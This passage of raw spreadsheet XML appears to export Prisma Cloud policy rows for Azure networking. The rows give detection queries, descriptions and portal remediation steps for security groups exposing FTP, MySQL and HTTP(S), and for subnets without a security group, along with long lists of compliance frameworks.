      <c r="A2348"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PCI DSS v4.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, CIS Controls v8.1, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, NIST CSF v2.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST 800-53 Rev 5, TX-RAMP Level 1, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST CSF, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, Telecommunications Security Act - TSA, NIST 800-53 Rev4, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, TX-RAMP Level 1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Fedramp (Moderate), Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, CSA CCM v.4.0.1, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, CSA CCM v4.0.12,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PCI DSS v4.0,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TX-RAMP Level 2,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PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2348" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2348" s="2" t="inlineStr"/>
      <c r="D2348" t="inlineStr"/>
      <c r="E2348" t="inlineStr"/>
      <c r="F2348" t="inlineStr"/>
      <c r="G2348" t="b">
        <v>1</v>
      </c>
      <c r="H23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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2348" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2348" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on FTP (TCP Port 21)</t>
        </is>
      </c>
      <c r="L2348" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2348" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2348" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2348" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2348" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2348" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2348" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2348" t="inlineStr"/>
      <c r="T2348" t="b">
        <v>0</v>
      </c>
      <c r="U2348" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2348" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2348" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on FTP (TCP Port 21). Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict FTP solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2348"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8" t="inlineStr"/>
      <c r="Z2348"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_Port.inRange(21,21) or destinationPortRanges[*] contains _Port.inRange(21,21) ))] exists</t>
        </is>
      </c>
      <c r="AA2348" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2348" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2348" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-282</t>
        </is>
      </c>
      <c r="AD2348" t="b">
        <v>1</v>
      </c>
      <c r="AE2348" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2348" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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8" t="inlineStr">
        <is>
          <t>472e08a2-c741-43eb-a3ca-e2f5cd275cf7</t>
        </is>
      </c>
      <c r="AI2348" t="inlineStr">
        <is>
          <t>1fb5d1ac-17f1-43f1-8bf6-aa73005175b6</t>
        </is>
      </c>
      <c r="AJ2348" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2348" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2349">
      <c r="A2349" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013,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HIPAA, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v8.2 [Deprecated], CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, CIS Controls v8.1, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, NIST CSF v2.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST CSF, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, Telecommunications Security Act - TSA, NIST 800-53 Rev4, CIS Controls v7.1, SOC 2, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, TX-RAMP Level 1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Fedramp (Moderate), Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, HITRUST CSF v.11.2.0, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MPAA Content Protection Best Practices, Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev 5, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, NIST CSF, ISO/IEC 27002:2013, Copy of CIS Controls v8, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, ITSG-33, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, NIST CSF, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, GDPR, NIST CSF, SOC 2, NIST CSF, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), Telecommunications Security Act - TSA, ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2349" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2349" s="2" t="inlineStr"/>
      <c r="D2349" t="inlineStr"/>
      <c r="E2349" t="inlineStr"/>
      <c r="F2349" t="inlineStr"/>
      <c r="G2349" t="b">
        <v>0</v>
      </c>
      <c r="H23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49" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2349" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2349" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on MySQL (TCP Port 3306)</t>
        </is>
      </c>
      <c r="L2349" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2349" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2349" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2349" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2349" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2349" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2349" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2349" t="inlineStr"/>
      <c r="T2349" t="b">
        <v>0</v>
      </c>
      <c r="U2349" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2349" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2349" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on MySQL (TCP Port 3306). Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict MySQL solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2349" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to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OR set the 'Action' to 'Deny' OR 'Delete' the rule based on your requirement.
7. 'Save' your changes.</t>
        </is>
      </c>
      <c r="Y2349" t="inlineStr"/>
      <c r="Z2349" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name= 'azure-network-nsg-list' AND json.rule = securityRules[?any(access equals Allow and direction equals Inbound and (sourceAddressPrefix equals Internet or sourceAddressPrefix equals * or sourceAddressPrefix equals 0.0.0.0/0 or sourceAddressPrefix equals ::/0) and (protocol equals Tcp or protocol equals *) and (destinationPortRange contains _Port.inRange(3306,3306) or destinationPortRanges[*] contains _Port.inRange(3306,3306) ))] exists</t>
        </is>
      </c>
      <c r="AA2349" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2349" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2349" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-274</t>
        </is>
      </c>
      <c r="AD2349" t="b">
        <v>1</v>
      </c>
      <c r="AE2349" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2349" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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49" t="inlineStr">
        <is>
          <t>5dbd0da1-cfa4-4bce-a753-56dade428bd4</t>
        </is>
      </c>
      <c r="AI2349" t="inlineStr">
        <is>
          <t>8c36bb5c-2a53-4c58-97bf-2ccf2f4742fc</t>
        </is>
      </c>
      <c r="AJ2349" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2349" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2350">
      <c r="A2350" t="inlineStr">
        <is>
          <t>CIS v2.1.0 (Azure) Level 1, NIST 800-53 Rev 5, NIST 800-53 Rev 5, CIS v2.0.0 (Azure) Level 1, HITRUST CSF v.11.2.0, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1</t>
        </is>
      </c>
      <c r="B2350" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2350" s="2" t="inlineStr"/>
      <c r="D2350" t="inlineStr"/>
      <c r="E2350" t="inlineStr"/>
      <c r="F2350" t="inlineStr"/>
      <c r="G2350" t="b">
        <v>1</v>
      </c>
      <c r="H23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50" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2350" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2350" t="inlineStr">
        <is>
          <t>Azure Network Security Group having Inbound rule overly permissive to HTTP(S) traffic</t>
        </is>
      </c>
      <c r="L2350" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2350" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2350" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2350" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2350" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2350" t="inlineStr">
        <is>
          <t>CM</t>
        </is>
      </c>
      <c r="R2350" t="inlineStr">
        <is>
          <t>CM-07-00 : Least Functionality</t>
        </is>
      </c>
      <c r="S2350" t="inlineStr"/>
      <c r="T2350" t="b">
        <v>0</v>
      </c>
      <c r="U2350" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2350" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2350" t="inlineStr">
        <is>
          <t>This policy identifies Network Security Groups (NSGs) that have inbound rules allowing overly permissive access to HTTP or HTTPS traffic.
A network security group contains a list of security rules that allow or deny inbound or outbound network traffic based on source or destination IP address, port, and protocol. Overly permissive inbound rules for HTTP(S) traffic increase the risk of unauthorized access and potential attacks on your network resources. This can lead to data breaches, exposure of sensitive information, and other security incidents.
As a best practice, it is recommended to configure NSGs to restrict HTTP(S) traffic to only necessary and trusted IP addresses.</t>
        </is>
      </c>
      <c r="X2350" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact on your applications/services. Evaluate whether you want to edit the rule and limit access to specific users, hosts, and services only, deny access, or delete the rule completely.
1. Log in to the Azure Portal.
2. Select 'All services'.
3. Select 'Network security groups', under NETWORKING.
4. Select the Network security group you need to modify.
5. Select 'Inbound security rules' under Settings.
6. Select the rule you need to modify, and edit it to allow specific IP addresses and Port ranges OR set the 'Action' to 'Deny' OR 'Delete' the rule based on your requirement.
7. 'Save' your changes.</t>
        </is>
      </c>
      <c r="Y2350" t="inlineStr"/>
      <c r="Z2350" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name= 'azure-network-nsg-list' AND json.rule = securityRules[?any((sourceAddressPrefix equal ignore case Internet or sourceAddressPrefix equals * or sourceAddressPrefix equals 0.0.0.0/0 or sourceAddressPrefix equals ::/0) and access equal ignore case Allow and direction equal ignore case Inbound and ((protocol equal ignore case Tcp and (destinationPortRange contains * or destinationPortRange contains _Port.inRange(80,80) or destinationPortRange contains _Port.inRange(443,443) or destinationPortRanges any equal * or destinationPortRanges[*] contains _Port.inRange(80,80) or destinationPortRanges contains _Port.inRange(443,443) )) or (protocol contains * and (destinationPortRange contains _Port.inRange(80,80) or destinationPortRange contains _Port.inRange(443,443) or destinationPortRanges[*] contains _Port.inRange(80,80) or destinationPortRanges contains _Port.inRange(443,443) ))) )] exists</t>
        </is>
      </c>
      <c r="AA2350" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2350" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2350" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-1246</t>
        </is>
      </c>
      <c r="AD2350" t="b">
        <v>1</v>
      </c>
      <c r="AE2350" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2350" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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0" t="inlineStr">
        <is>
          <t>0df1ee1f-c302-4826-ab09-bfa974e21543</t>
        </is>
      </c>
      <c r="AI2350" t="inlineStr">
        <is>
          <t>50afdea0-5b38-4903-90fe-b019ee3b8309</t>
        </is>
      </c>
      <c r="AJ2350" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2350" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2351">
      <c r="A2351" t="inlineStr"/>
      <c r="B2351" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2351" s="2" t="inlineStr"/>
      <c r="D2351" t="inlineStr"/>
      <c r="E2351" t="inlineStr"/>
      <c r="F2351" t="inlineStr"/>
      <c r="G2351" t="b">
        <v>0</v>
      </c>
      <c r="H23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51" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2351" t="inlineStr">
        <is>
          <t>azure-network-private</t>
        </is>
      </c>
      <c r="K2351" t="inlineStr">
        <is>
          <t>cj-test</t>
        </is>
      </c>
      <c r="L2351" t="inlineStr"/>
      <c r="M2351" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2351" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2351" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2351" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2351" t="inlineStr"/>
      <c r="R2351" t="inlineStr"/>
      <c r="S2351" t="inlineStr">
        <is>
          <t>test</t>
        </is>
      </c>
      <c r="T2351" t="b">
        <v>0</v>
      </c>
      <c r="U2351" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2351" t="inlineStr">
        <is>
          <t>azure-network-private-endpoint</t>
        </is>
      </c>
      <c r="W2351" t="inlineStr">
        <is>
          <t>test</t>
        </is>
      </c>
      <c r="X2351" t="inlineStr"/>
      <c r="Y2351" t="inlineStr"/>
      <c r="Z2351" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND cloud.service = 'Azure Virtual Network' AND api.name = 'azure-network-private-endpoint' AND json.rule = properties.privateLinkServiceConnections[*].properties.privateLinkServiceId exists</t>
        </is>
      </c>
      <c r="AA2351" t="inlineStr">
        <is>
          <t>Christie Mustone</t>
        </is>
      </c>
      <c r="AB2351" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2351" t="inlineStr"/>
      <c r="AD2351" t="b">
        <v>0</v>
      </c>
      <c r="AE2351" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2351" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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1" t="inlineStr">
        <is>
          <t>8f396055-c407-4c87-aff4-a3a61e198e70</t>
        </is>
      </c>
      <c r="AI2351" t="inlineStr">
        <is>
          <t>72882c09-7f3f-4b7a-9cef-e5ac8752c702</t>
        </is>
      </c>
      <c r="AJ2351" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2351" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2352">
      <c r="A2352" t="inlineStr">
        <is>
          <t>CIS v1.1 (Azure)</t>
        </is>
      </c>
      <c r="B2352" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2352" s="2" t="inlineStr"/>
      <c r="D2352" t="inlineStr"/>
      <c r="E2352" t="inlineStr"/>
      <c r="F2352" t="inlineStr"/>
      <c r="G2352" t="b">
        <v>0</v>
      </c>
      <c r="H23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52" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2352" t="inlineStr">
        <is>
          <t>azure-network-public</t>
        </is>
      </c>
      <c r="K2352" t="inlineStr">
        <is>
          <t>tadenugba build policy1</t>
        </is>
      </c>
      <c r="L2352" t="inlineStr"/>
      <c r="M2352" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2352" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2352" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2352" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2352" t="inlineStr">
        <is>
          <t>2</t>
        </is>
      </c>
      <c r="R2352" t="inlineStr">
        <is>
          <t>2.7</t>
        </is>
      </c>
      <c r="S2352" t="inlineStr">
        <is>
          <t>tadenugba_label</t>
        </is>
      </c>
      <c r="T2352" t="b">
        <v>0</v>
      </c>
      <c r="U2352" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2352" t="inlineStr">
        <is>
          <t>azure-network-public-ip-address</t>
        </is>
      </c>
      <c r="W2352" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-public-ip-address' and json.rule = properties.ipAddress exists addcolumn properties.ipAddress</t>
        </is>
      </c>
      <c r="X2352" t="inlineStr"/>
      <c r="Y2352" t="inlineStr"/>
      <c r="Z2352" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-public-ip-address' and json.rule = properties.ipAddress exists addcolumn properties.ipAddress</t>
        </is>
      </c>
      <c r="AA2352" t="inlineStr">
        <is>
          <t>Tunde Adenugba</t>
        </is>
      </c>
      <c r="AB2352" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2352" t="inlineStr"/>
      <c r="AD2352" t="b">
        <v>0</v>
      </c>
      <c r="AE2352" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2352" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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2" t="inlineStr">
        <is>
          <t>d7e1ebd3-2b0e-41a8-bf96-cb78e4d326b0</t>
        </is>
      </c>
      <c r="AI2352" t="inlineStr">
        <is>
          <t>d206a3e7-c7b2-4ed7-ac73-f3e6c95d402e</t>
        </is>
      </c>
      <c r="AJ2352" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2352" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2353">
      <c r="A2353" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, ISO/IEC 27001:2022, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST CSF, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev 5, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO 27002:2022, ISO/IEC 27002:2013, ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v8.1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF, New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1, PCI DSS v3.2.1, ISO/IEC 27002:2013, SOC 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, TX-RAMP Level 1, ISO/IEC 27017:2015, Telecommunications Security Act - TSA, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, MLPS 2.0 (Level 2), CIS Controls v8, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, CSA CCM v.4.0.1, ISO/IEC 27001:2022, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, NIST CSF, ISO/IEC 27002:2013, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, SOC 2, ITSG-33, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, NIST CSF, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, GDPR, NIST CSF, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, ISO/IEC 27002:2013, DORA, TX-RAMP Level 2, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, Copy of New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2353" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2353" s="2" t="inlineStr"/>
      <c r="D2353" t="inlineStr"/>
      <c r="E2353" t="inlineStr"/>
      <c r="F2353" t="inlineStr"/>
      <c r="G2353" t="b">
        <v>1</v>
      </c>
      <c r="H23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53" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2353" t="inlineStr">
        <is>
          <t>azure-network-subnet</t>
        </is>
      </c>
      <c r="K2353" t="inlineStr">
        <is>
          <t>Azure Virtual Network subnet is not configured with a Network Security Group</t>
        </is>
      </c>
      <c r="L2353" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2353" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2353" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2353" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2353" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2353" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2353" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2353" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2353" t="b">
        <v>0</v>
      </c>
      <c r="U2353" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2353" t="inlineStr">
        <is>
          <t>azure-network-subnet-list</t>
        </is>
      </c>
      <c r="W2353" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Network (VNet) subnets that are not associated with a Network Security Group (NSG).
While binding an NSG to a network interface of a Virtual Machine (VM) enables fine-grained control of the VM, associating an NSG to a subnet enables better control over network traffic to all resources within a subnet.
It is recommended to associate an NSG with a subnet so that you can protect your VMs on a subnet-level.
For more information,
https://learn.microsoft.com/en-gb/archive/blogs/igorpag/azure-network-security-groups-nsg-best-practices-and-lessons-learned
https://learn.microsoft.com/en-us/azure/private-link/private-endpoint-overview#limitations
